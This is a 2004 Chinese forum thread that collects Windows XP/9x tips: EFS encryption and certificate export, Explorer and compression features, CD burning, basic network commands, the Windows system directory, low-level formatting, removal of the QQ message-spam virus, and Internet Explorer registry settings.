这是WinXP我们提供的一种高级文件加密方法——加密文件系统（EFS）。EFS是一种数字加密方式：Windows首先以一把“公钥”（WinXP自己的加密算法）对文件进行加密，再配给用户一把用于解密的“私钥”（包含在个人数字证书中）。加密过的文件，只有通过“公钥”与“私钥”共同认证后产生的“金钥”才能被解密。
打开要加密的文件或文件夹的“属性”对话框，选择其“常规”页中的“高级”，勾选“高级属性”里的“加密内容以便保护数据”，确定后，加密的文件/文件夹名会以绿色表示，这样，即使是管理员账户，也不能读取文件的内容了。
这就是WinXP的高级文件保密，就这么简单。之后的问题是，如果加密文件拷贝到其他机器上，如何实现其解密？这就涉及到了个人数字证书的使用。
4.个人数字证书的导出与导入
在“运行”栏里输入“certmgr.msc”，打开“证书”，依次展开“个人”→“证书”，右键单击要导出的证书，在“所有任务”中选择“导出”，在向导中选择“是，导出私钥”，再按需要设置好私钥保护密码和导出路径后，即导出了个人数字证书。
加密文件被拷贝到其他机器上后，要对其进行解密，需要先在此机器上新建一个与原加密用户相同用户名及密码的账户，再将之前导出的证书拷贝到此机器上双击运行，即可实现数字证书的导入。
注意：WinXP为了防止私钥被随意导出，凡导入的证书在默认情况下均不能被再次导出。如果有再次导出的需要，需要在导入数字证书过程中，输入私钥保护密码一步时，勾选“标志此密钥为可导出的……”，这样才能使导入的证书能被再次导出。
二、资源管理器的增强
1.图片浏览
WinXP之前这一功能非ACDSee莫属，然而WinXP却带来了更为易用的图片浏览功能。众所周知，只要选择“缩略图”方式显示图片，我们就可以图片的缩略图预览其效果。选择“幻灯片”方式，则可以更清楚地看到图片的预览效果。WinXP还为我们提供了第3种方式浏览图片：“幻灯片播放”，只需选择资源管理器左侧“图片任务”中的“作为幻灯片查看”，即可浏览图片，在屏幕的右上角依次有播放、暂停、上一幅、下一幅及关闭的功能按钮。需要提醒的是，如果选择了一张或者多张图片后再选择“作为幻灯片查看”，则只会放映所选择的图片。
还有一点技巧：如果嫌“缩略图”方式预览的图片太小，我们可以通过修改注册表的方式改变其大小。在“运行”栏里输入“regedit”，打开注册表编辑器，依次展开HKEY_CUR RENT_USER Software MicrosoftWindows CurrentVersion Explorer，在其下新建一名为ThumbnailSize的DWORD值，将值改为十进制的200，可以看到预览图变大了吧。另外，新建名为ThumbnailQuality的DWORD值，通过设置其值改变缩略图的图片质量，如设为80，则以80%的质量显示缩略图。通过减小其值，可以缩短系统显示缩略图的时间。
注意：如果当前目录下有图片却没有出现“图片任务”或找不到“幻灯片”方式，可参见后文设置文件夹模板。
2.数码图片的处理
使用数码相机等设备，WinXP也准备了“扫描仪与照相机向导”。当数码相机连接到计算机后，在系统弹出的任务选择对话框里选择“将图片复制到计算机上的一个文件夹”，WinXP会自动读取相机里的图片，接下来在“扫描仪和照相机向导”选择要获取的图片，还有存放的路径，完成后WinXP就会把所选择的照片存放到指定目录了。值得一提的是，在选择存放路径时，WinXP已默认提供了一系列有助于分类的存放方式，方便我们对数码图片的管理。
双击一个图片文件，如果没有安装其他图片浏览软件，WinXP会首先调用“Windows图片和传真查看器”来打开文件（若已安装其他图片软件，也可右击图片文件并在“打开方式”中选择此工具）。可用其对图片进行简单加工，如缩放查看、旋转、打印、复制到等。试过用“Windows图片和传真查看器”打开TIFF文件吗？可以看到工具栏上又多出不少东西，通过这些工具可以给图片添加“注释”。至于用处，想想看，可以在数码相片上写上照相的时间地点，场景描述等，多年后回味，别有一番滋味啊。这一注释功能并不直接修改图片，在你不需要时可随时删去所加的注释，而保留图片的原样。
3.个性的文件夹
如果你也崇尚个性张扬，相信总会想方设法把自己的WinXP弄得与众不同。这里就来看一下，如何用WinXP百宝箱里的东东，把系统里大大小小的文件夹们，统统换掉那黄色的夹子外套。WinXP提供了很方便的文件夹自定义功能，在文件夹“属性”对话框的“自定义”页上，即可看见很多定义的内容。
文件夹模板：可供选择的有相册、图片、音乐和视频等，其区别在于不同的模板对应不同的默认文件查看方式（幻灯片、平铺、图标等）以及文件夹任务。使用了以上两种图片类文件夹模板，文件夹左侧的“常见任务栏”里，都会有“图片任务”供选择，而使用了音乐类或视频类文件夹模板，则分别对应的是“音乐任务”与“视频任务”。
文件夹图片：当文件夹以缩略图方式查看时，WinXP会把该文件夹里最近修改的4个图片作为默认的文件夹图片显示，但为了提醒自己，可以让它变得更醒目。只需单击“选择图片”就可选择某个图片作为此文件夹的图片。
文件夹图标：如果不以缩略图方式查看，文件夹将会以其“标准图标”表示——一个黄色的夹子，如果觉得这千篇一律的黄夹子没有个性，我们也可以换。单击“更改图标”，可以看到WinXP为我们在Shell32.dll里提供的许多图标，我们当然可以随便用上一用。
三、压缩与解压缩
目前我们使用的压缩解压缩软件想必都是WinZip或WinRAR等，它们各有自己的特点与用途，但实际应用中可以说95%以上的工作都是简单的压缩与解压缩，在这一点上，WinXP自带的压缩工具就足以满足需要了。
1.通过压缩磁盘对文件进行压缩
这种方法被WinXP冠名为“NTFS文件压缩”，只能在硬盘的NTFS分区上使用。打开要压缩文件/文件夹的“属性”对话框，选择“常规”页中的“高级”，勾选“高级属性”里的“压缩内容以便节省磁盘空间”，确定后，此文件/文件夹名会以蓝色显示。以这种方法压缩文件，实质上是对磁盘进行压缩，会带来了系统性能的降低（打开压缩文件时，系统将其解压缩，关闭文件时又重新压缩），因此建议仅用于对备份文件处理。
2.Zip文件的压缩
最先在Windows提供对Zip文件的支持始源于WinME，WinXP继承了这一特性，但基本上没有太多发展。这一功能被称为“Compressed（zipped） Folders”，只能进行最基本的压缩/解压缩工作，说好听点，就是“返璞归真”了。
实现方法一：在鼠标右键菜单上选择“新建”→“压缩（zipped）文件夹”。
实现方法二：选中欲压缩的文件（一个或多个），在其鼠标右键菜单上选择“发送到”→“压缩（zipped）文件夹”，即生成一个.zip文件。最后生成的文件名同鼠标单击的文件一致。
你还可以对.zip文件设置密码。打开一个.zip文件（确定是用WinXP自带功能打开，而不是用其他软件），选择菜单项的“文件”→“添加密码”，输入要设置的密码。之后，查看和解压缩此文件就需要密码了，可以满足一般的保密性要求。需要说明的是WinXP不能进行分卷压缩、添加注释等“高级任务”。
3.Zip文件的解压缩
压缩后的ZIP包可以像普通文件夹一样操作。如果要将ZIP包解压缩到指定位置，只需在其右键菜单上选择“全部提取...”利用“提取向导”，选择解压缩路径，输入密码（如果有的话），即可进行解压缩。
4.自解压包的制作
如果还有制作自解压包的需要，也不用去找什么专门工具，WinXP里仍然为你准备了——尽管微软并没有承认其存在。在“运行”对话框里输入“iexpress”，回车后打开“IExpress Wizard”。在向导里依次选择“Create new Self Extraction Directive file”→“Extract files only”（压缩目的：Package purpose）→输入解压缩时弹出对话框的标题（Package title）→输入对话框提示语（Confirmation prompt）→选择解压时是否显示许可协议（License agreement）→添加欲压缩的文件（Packaged files）→选择解压缩时窗口的显示方式（Show window）→输入解压缩完毕后对话框的提示语（Finished message）→选择压缩路径和文件名（Package Name and Options）→选择是否储存压缩日志，最后再“下一步”，就生成了一个.exe的自解压包。
“IExpress”还可生成.cab的压缩包和自动安装包，实现方法是分别在“压缩目的”一步里选择“Create compressed files only”和“Extract files and run an installation command”。
四、刻录功能
1.数据光盘的刻录：
这一方法较简单，总的来说只要将待刻录文件复制或另存到光盘就行，下面举个例子来说明具体操作：
（1）把要刻录的文件拖放到刻录机上。这时在刻录机的盘上会出现我们要刻录的文件的快捷方式。（2）点击左边的“CD写入任务”框中的“将这些文件写入CD”，WinXP会打开CD写入向导。（3）在“CD名称”中输入光碟的名称并按“下一步”开始刻录，刻录完成后出现提示。
由于WinXP是采用多区段方式刻录光盘的，在完成一次刻录任务后，并不会“完全终结”光盘，而会在结尾处留下一个“接口”，如果以后还要在该光盘上追加数据的话，只要有空间就能继续刻录。如果后面追加的文件与光盘中已有的某文件同名，则追加的文件会“覆盖”先前的文件，利用这个特性，你可以修改刻错在光盘上的文件，只要用同名的正确文件去“覆盖”它即可。
2.音乐光盘的刻录：
WinXP音乐光盘的刻录是依靠自带的Windows Media Player（以下简称WMP）结合刻录功能来完成的，能将WMA、MP3、WAV这3种音频文件直接转换并刻录成CD。下面以实际操作为例子来说明：
（1）把要刻录的音源复制或拖放到刻录机上。点击“CD写入任务”框中的“将这些文件写入CD”。（2）输入光碟的名称再按“下一步”继续。我们选择“生成一张音乐CD”并继续。（3）这时WinXP打开WMP，当然其实也可以跳过前面几步自己直接打开WMP。（4）点击右上角的“复制音乐”按钮。完成转换过程后状态就变为“正在复制到CD”，完成后会在右边出现光碟的状态。
当刻录完毕后，这时候再加入一个音源文件到左边的播放列表，歌曲的状态是“将不适合”。所以多区段方式刻录光盘这种方式不适用于音乐CD的刻录。
结语：从WinXP开始，微软已经在操作系统中轻描淡写地布下了一些重兵，你或许可从上文中窥得一二，也许今天它们中的一部分还没有被重视，但将来会怎样发展，应当在大多数人的预料中……另一方面，我们也看到这些功能并不够强大，甚至可以说部分还是小儿科，当然微软也会用另外的方法增强其系统功能，在下一期中，我们将介绍微软及一些使用者为WinXP开发的免费周边软件，敬请关注。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:02　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:09am 第 1 次编辑]

七。★★★windows中有关网络的几命令
1.Ping
    适用环境：WIN95/98/2000/NT
    使用格式：ping [-t] [-a] [-n count] [-l size]
    参数介绍：
    -t 让用户所在的主机不断向目标主机发送数据
    -a 以IP地址格式来显示目标主机的网络地址
    -n count 指定要ping多少次，具体次数由后面的count来指定
    -l size 指定发送到目标主机的数据包的大小
    主要功能：用来测试一帧数据从一台主机传输到另一台主机所需的时间，从而判断主响应时间。
    详细介绍：
    该命令主要是用来检查路由是否能够到达，由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速地检测你要去的站点是否可达，一般你在去某一站点时可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线是否连通，网络适配器配置是否正确，IP地址是否可用等；如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入：Ping　IP地址或主机名，执行结果显示响应时间，重复执行这个命令，你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数，你可以键入ping后回车其中会有很详细的说明。
    举例说明：
    当我们要访问一个站点例如www.chinayancheng. net时，就可以利用Ping程序来测试目前连接该网站的速度如何。执行时首先在Windows 9x系统上，单击“开始”键并选择运行命令，接着在运行对话框中输入Ping和用户要测试的网址，例如ping www.chinayan- cheng.net，接着该程序就会向指定的Web网址的主服务器发送一个32字节的消息，然后，它将服务器的响应时间记录下来。Ping程序将会向用户显示4次测试的结果。响应时间低于300毫秒都可以认为是正常的，时间超过400毫秒则较慢。出现“请求暂停（Request time out）”信息意味着网址没有在1秒内响应，这表明服务器没有对Ping做出响应的配置或者网址反应极慢。如果你看到4个“请求暂停”信息，说明网址拒绝Ping请求。因为过多的Ping测试本身会产生瓶颈，因此，许多Web管理员不让服务器接受此测试。如果网址很忙或者出于其他原因运行速度很慢，如硬件动力不足，数据信道比较狭窄，过一段时间可以再试一次以确定网址是不是真的有故障。如果多次测试都存在问题，则可以认为是用户的主机和该网址站点没有联接上，用户应该及时与因特网服务商或网络管理员联系。
    2.winipcfg
    适用环境：WIN95/98/2000
    使用格式：winipcfg [/?] [/all]
    参数介绍：
    /? 显示winipcfg的格式和参数的英文说明
    /all 显示所有的有关IP地址的配置信息
    主要功能：显示用户所在主机内部的IP协议的配置信息
    详细介绍：
    winipcfg程序采用windows窗口的形式来显示IP协议的具体配置信息，如果winipcfg命令后面不跟任何参数直接运行，程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入winipcfg／？可获得winipcfg的使用帮助，键入winipcfg／all可获得IP配置的所有属性。
    举例说明：
    如果我们想很快地了解某一台主机的IP协议的具体配置情况，可以使用winipcfg命令来检测。其具体操作步骤如下：在“运行”对话框中，直接输入winipcfg命令，接着按一下回车键，我们就会看到一个界面。在该界面中，我们了解到目前笔者所在的计算机是用的3COM类型的网卡，网卡的物理地址是00-60-08-07-95-14，主机的IP地址是210.73.140.13，子网掩码是255.255.255.192，路由器的地址是210.73.140.1，如果用户想更加详细地了解该主机的其他IP协议配置信息，例如DNS服务器、DHCP服务器等方面的信息，可以直接单击该界面中的“详细信息”按钮。
3.tracert
    适用环境：WIN95/98/2000/NT
    使用格式：tracert [-d] [-h maximum_hops] [-j host_list] [-w timeout]
    参数介绍：
    -d 不解析目标主机的名字
    -h maximum_hops 指定搜索到目标地址的最大跳跃数
    -j host_list 按照主机列表中的地址释放源路由
    -w timeout 指定超时时间间隔，程序默认的时间单位是毫秒
    主要功能：判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
    详细介绍：
    这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：tracert 主机IP地址或主机名。执行结果返回数据包到达目的主机前所经历的中继站清单，并显示到达每个中继站的时间。该功能同ping命令类似，但它所看到的信息要比ping命令详细得多，它把你送出的到某一站点的请求包，所走的全部路由都告诉你，并且通过该路由的ip是多少，通过该ip的时延是多少。具体的tracert命令后还可跟好多参数，大家可以键入tracert后回车，其中会有很详细的说明。
    举例说明：
    要是大家想要了解自己的计算机与目标主机之间详细的传输路径信息，可以使用tracert命令来检测一下。其具体操作步骤如下：在“运行”对话框中，直接输入tracert [url]www.chinayancheng.net命令，接着单击一下回车键，我们就会看到一个界面；当然大家也可以在MS-DOS方式下，输入tracert www.chinayancheng.net命令，同样也能看到结果画面。在该画面中，我们可以很详细地跟踪连接到目标网站www.chinayancheng.net的路径信息，例如中途经过多少次信息中转，每次经过一个中转站时花费了多长时间，通过这些时间，我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。如果我们在tracert命令后面加上一些参数，还可以检测到其他更详细的信息，例如使用参数－d，可以指定程序在跟踪主机的路径信息时，同时也解析目标主机的域名。
    4.netstat
    适用环境：WIN95/98/2000/NT
    使用格式：netstat [-r] [-s] [-n] [-a]
    参数介绍：
    -r 显示本机路由标的内容
    -s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）
    -n 以数字表格形式显示地址和端口
    -a 显示所有主机的端口号
    主要功能：该命令可以使用户了解到自己的主机是怎样与因特网相连接的。
    详细介绍：
    netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，例如显示网络连接、路由表和网络接口信息，可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat／？命令来查看一下该命令的使用格式以及详细的参数说明，该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：netstat［参数］，利用该程序提供的参数功能，我们可以了解该命令的其他功能信息，例如显示以太网的统计信息，显示所有协议的使用状态，这些协议包括TCP协议、UDP协议以及IP协议等，另外还可以选择特定的协议并查看其具体使用信息，还能显示所有主机的端口号以及当前主机的详细路由信息。
    举例说明：
    如果我们想要了解盐城市信息网络中心节点的出口地址、网关地址及主机地址等信息的话，可以使用netstat命令来查询。具体操作方法如下：在“运行”对话框中，直接输入netstat命令，接着单击一下回车键，我们就会看到一个界面；当然大家也可以在MS-DOS方式下，输入netstat命令。在界面中，我们可以了解到用户所在的主机采用的协议类型、当前主机与远端相连主机的IP地址以及它们之间的连接状态等信息。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:03　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:09am 第 1 次编辑]

八。★★★了解你的windows目录和系统文件
Windows目录是windows 9x系列操作系统用于集中存放系统文件的目录。很多同学在操作电脑时，因为不知道Windows目录下都存放了些什么内容，而不敢大胆操作。现在把Windows目录下的内容介绍一下，希望对同学们有所帮助。
一、Windows目录下的主要子目录
◆All Users目录：此子目录下是电脑的所有用户及这些用户个人设定的开始菜单及桌面等信息；
◆Application data目录：此目录存放了电脑用户安装应用程序时的一些数据信息；
◆Command目录：这个目录下放置了微软的DOS下的常用命令，如chkdsk,format, fdisk等常用的命令；
◆Config目录：它是用来存放Windows中的硬件配置文件；
◆Cursors目录：Windows下用来表示系统各种状态的光标文件都放置在此目录下；
◆Desktop目录：系统图标以及由应用程序和文档建立的桌面快捷方式都存放在这里，这里的图标文件与桌面上的图标动态关联着；
◆Downloaded Program Files目录：如果你经常上网下载东西，此目录成为你下载软件的默认目录；
◆Favorites目录：你上网时，添加到收藏夹里的网页都在这里；
◆Fonts目录：Windows系统的字体文件以及以后你要增加的字体文件都存放在这个目录里；
◆Help目录：在该目录下可以找到Windows系统的帮助功能所涉及的全部文件；
◆History目录：在默认状态下，主要是存放Internet Explorer近二十天的操作记录。
◆Media目录：此目录存放着系统的声音文件；
◆Offline Web Pages目录：离线浏览的文件都放在此目录下；
◆SendTo目录：当你对“文件”使用过“发送到”命令时的目标地址都在这个目录下；
◆Start Menu目录：这个目录下的文件与桌面上的“开始”菜单相对应；
◆System32目录：与sytem目录都是系统文件夹，存放着Windows的系统文件和硬件驱动程序等重要信息；
◆Tasks目录：对于给Windows系统添加的任务都存放在这里；
◆Temp目录：主要存放了执行解压缩与安装程序等对系统操作时的临时文件；
◆Temporary Internet Files目录：它是用来存放浏览网页时产生的临时文件；
◆Web目录：存放一些与web相关的图片文件等。
二、Windows目录下的主要系统文件
◆Accstat.exe 回收站可执行程序；
◆Calc.exe 系统自带的计算器；
◆Cdplayer.exe系统自带的CD播放器；
◆Cleanmgr.exe 磁盘清理工具；
◆Command.com 命令解释程序，实现进入MS-DOS状态；
◆Control.exe 控制面板可执行程序；
◆Cvtaplog.exe 磁盘碎片整理的辅助程序；
◆Defrag.exe 磁盘碎片整理程序；
◆Emm386.exe 扩展内存管理程序；
◆Explorer.exe 该程序启动“资源管理器”；
◆Fontview.exe 字体查看程序；
◆Freecell.exe 空当接龙游戏，Mshearts.exe网上红心大战游戏，Sol.exe纸牌游戏，Winmine.exe扫雷游戏；
◆Notepad.exe Windows系统的记事本；
◆Pbrush.exe Windows系统的画图程序；
◆Ping.exe 用于检查测试本机的网线是否与主机建立联系；
◆regedit.exe 注册表编辑器；
◆Scandskw.exe 用于可修复磁盘表面和磁盘上的数据错误的磁盘扫描程序；
◆Scanregw.exe 该程序可检查注册表的错误，若正确，提示备份；
◆Sndrec32.exe Windows系统自带的录音机，声音文件格式为*.wav；
Sndvol32.exe 音量调节程序；
◆Winfile.exe 文件管理器，该程序可查找、查看文件和文件夹，显示文件信息及其相应的操作;
◆write.exe 写字板。
当大家了解了Windows的目录中的内容后，操作起来可以省事不少。比如，我们要打开“记事本”，通常情况下我们需要依次打开“开始／程序／附件／记事本”，而如果我们知道了Notepad.exe文件就是打开“记事本”的可执行程序的话，那么我们只需要在“开始／运行”当中输入“Notepad.exe”，就可以打开“记事本”了。这样操作起来是不是更加方便了呢。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:10　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/05/16 05:12pm 第 1 次编辑]

九。★★★低级格式化的主要作用
低级格式化的主要作用
低级格式化的主要作用用以下几种：
1、测试硬盘介质，对已损坏的磁道和扇区做“坏”标记
2、写入扇区ID，清空扇区内容
如果形象地看硬盘盘片，它是一道一道的，而每一道又分为若干块，每块包括了扇区ID和扇区数据区。在低级格式化的时候，低格软件会在每一块的开头部分写入一个扇区ID并且清空数据区。我们在使用HP软件来修复硬盘坏扇区的时候，在下半部分出错框框里会发现有的扇区是CRC校验失败，有的是丢失了扇区ID，可以形象地显现出这两部分的内容。
3、设置交错因子
硬盘的扇区ID不是一个挨一个顺序排列的，而是会隔着几个几个排列下去，为什么会是这样呢，是因为硬盘在读完一个扇区的内容后，在磁头移动到下一个扇区位置时来不及读掉其中的内容，需要一个时间的滞留，显然，如果顺序安排扇区ID，跟实际情况不相符合，这样的话，只有相隔几个位置再安排下一个扇区ID，这样会更符合硬盘的工作规律。当然啦，从实际情况来看，硬盘的交叉因子的设定会根据不同的机器情况而设定的，有时低格后会令交叉因子更适合你机子的情况，从而提高的硬盘的读写速度。
正确的低格过程绝不会在物理上损伤硬盘，用不正确的低格工具则可能严重破坏硬盘的信息，而导致硬盘不能正常使用

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:11　　 标题: 整理了七个小时的东东！[申请加精]

十。★★★封杀QQ消息连发器病毒
日前，QQ消息发送器类型的病毒在网络世界肆意横行。这类病毒发作时会寻找QQ窗口，每隔一段时间就给被感染用户的所有线上的QQ好友发送诸如“快去这看看，里面有蛮好好东西-- ”“http://nicex.xxx.co、、看看啊. 我最近照的照片~ 才扫描到网上的.看看我是不是变了样?”之类的假消息，诱惑用户点击一个网站，如果有人信以为真点击该链接的话，就会被病毒无情感染，然后成为毒源，继续传播
    在此，教您封杀这类讨厌的病毒，让您在聊天时不再受到骚扰。
        第一步，修复您的注册表。因为此类病毒在运行后都会在注册表的启动项中加入病毒本身。找出病毒本身的程序名，禁止当前进程中的病毒程序，然后将其在启动项中的键值删除。不了解注册表知识的朋友可以下载一个注册表修复工具，或者在线修复注册表。
    第二步，清除病毒程序，在系统文件夹中查找以上两篇文章中所提到的相同名称的病毒程序，将其删除。或者下载“QQ消息发送器病毒专杀工具”或者“QQ自动发消息专杀工具QQAV”清除病毒。
    第三步，杜绝再次感染。因为此类病毒是利用IE浏览器的漏洞传播，所以应当尽量避免浏览陌生的网站。推荐安装IE防改精灵，熟悉注册表的朋友可以禁止修改注册表。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:13　　 标题: 整理了七个小时的东东！[申请加精]

十一。★★★ie项目修改大全！所有的ie问题都来这里看吧！
IE选项注册表控制大全 http://www.canglou.com/ShowArticle.asp?ArticleID=1517
近来，很多网友在各大BBS提出一个相同的问题----IE选项全部或其中某几个不能使用，怎么办？有很多不是很了解注册表的朋友看不懂，在这种情况下，我只好重新解释一下相关的Dword值的用途，希望大家能够理解。如果还是不能够理解的话，就到这里下载一个还原文件吧。
特别注意：有些系统没有以下的键值，需要手工添加：
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\GeneralTab Internet Explorer选项中的常规
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab Internet Explorer选项中的安全
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ContentTab Internet Explorer选项中的内容
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ConnectionsTab Internet Explorer选项中的连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\ProgramsTab Internet Explorer选项中的程序
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\AdvancedTab Internet Explorer选项中的高级
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\PrivacyTab Internet Explorer选项中的隐私 ◆IE6中才有◆
以上是几个大项，小项的解释在下面：
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Colors 颜色
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Links 链接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Fonts 字体
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Languages 语言
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Connection Settings 连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Proxy 代理
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: HomePage 主页
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: History 历史
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Messaging 程序--电子邮件、新闻组、Internet呼叫
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Ratings 分级审查
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Certificates 证书+发行商
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifPers 证书
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifSite 证书
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CertifPub 发行商
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Cache IE临时文件大小设置控制
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: AutoConfig 局域网自动配置
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Accessibility 辅助功能
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: SecChangeSettings 安全自定义
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: SecAddSites IE中安全--站点增加控制
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Profiles 内容--个人信息--配置文件
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: FormSuggest 内容--个人信息--自动完成--表单
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: FormSuggest Passwords 内容--个人信息--自动完成--表单上的用户名和密码
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Connwiz Admin Lock 连接--建立连接
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: CalendarContact 程序--日历、联系人列表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Advanced 高级
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Settings Internet临时文件
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: ResetWebSettings 程序--重置WEB设置
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\
Dword: Check_If_Default 检查IE是不是默认浏览器
以上就是注册表中IE选项控制键值。
使用方法：假设要屏蔽主页选项，就可以在HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\下建立一个Dwoed值，并修改为1，这样就可以直接取消IE中有关主页的选项。还原方法：将Dword=1修改为Dword=0即可。经过测试，这种方法在98/2000/XP下均有效。
利用注册表定制IE的技巧数则 http://www.canglou.com/ShowArticle.asp?ArticleID=1261
经常从有关电脑报刊上看到利用注册表定制Windows的介绍，不过其中涉及IE的内容却并不是很多，事实上我们通过对注册表数据库进行修改同样可达到对IE的运行状态进行调整的目的。这些定制项目主要包括以下几个方面（限于篇幅，下面介绍的都是必须使用注册表数据库进行调整的项目，那些可以使用控制面板及IE的"Internet选项"对话框进行修改的项目则不在此之列）：
    一、调整IE的默认下载文件夹
    一般来说，我们若直接使用IE在网上下载文件，系统会自动将其下载到"C:\WINDOWS\Desktop"文件夹（即Windows 98的桌面）中，时间一长就会将桌面搞得乱七八糟！与其事后清理，不如直接对系统设置进行调整，将其改为某个专门的下载文件夹（如"C:\下载"文件夹中）。为此，我们只需启动Windows 98的注册表编辑器并依次展开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer分支，此时我们就可以在Internet Explorer分支下发现一个名为"DownLoad Directory"的字符串值，其默认值为"C:\WINDOWS\Desktop"。它就是用于定义IE默认文件下载路径的，我们只需对其进行适当修改（如将其改为"C:\下载"），此后再使用IE直接下载文件时，系统就会将文件直接保存到"C:\下载"文件夹中。

    二、让IE在状态栏中显示完整超级链接地址的方法

    大家都知道，我们使用IE浏览某个网页时，只需将鼠标放到某个超级链接的下面，系统就会在状态栏中显示出该超级链接的地址，不过系统默认显示的是相对地址（跟我们在DOS中使用的相对路径差不多），这在某些情况下可能并不能满足广大用户的需要。别着急，我们只需启动Windows 98的注册表编辑器并依次展开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer分支，然后就可以在Internet Explorer分支发现一个名为"Show_FullURL"的Dword值，它就是用于设置是否在IE状态栏上显示超级链接地址的，我们只需将其由0改为1，IE就会在状态栏上显示出相应超级链接的绝对地址，从而满足了广大用户的需要。

    三、取消超级链接下面的下划线

    尽管添加一个下划线可以让用户更加容易分清超级链接与普通文本的区别，不过有些人似乎不太喜欢这些超级连接下划线，而希望取消它们，这也是非常容易办到的！事实上，IE同时为下划线提供了三种不同的显示状态，它们分别是"始终显示下划线"、"始终不显示下划线"和"将鼠标放到超级链接上面的时候显示下划线"，广大用户完全可根据自己的需要对其加以调整。具体来说，我们若拟对IE是否显示超级链接的下划线进行设置，则应启动Windows 98的注册表编辑器并依次展开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main分支，然后就可以看到一个名为"Ancher Underline"的字符串值，它就是用于设置是否显示超级链接的下划线的。当其值为NO时表示始终不显示下划线、为YES时表示始终显示下划线、为HOVER则表示通常不显示下划线，而将鼠标放到相应超级链接下面之后显示下划线，广大用户只需根据自己的需要加以更改即可。
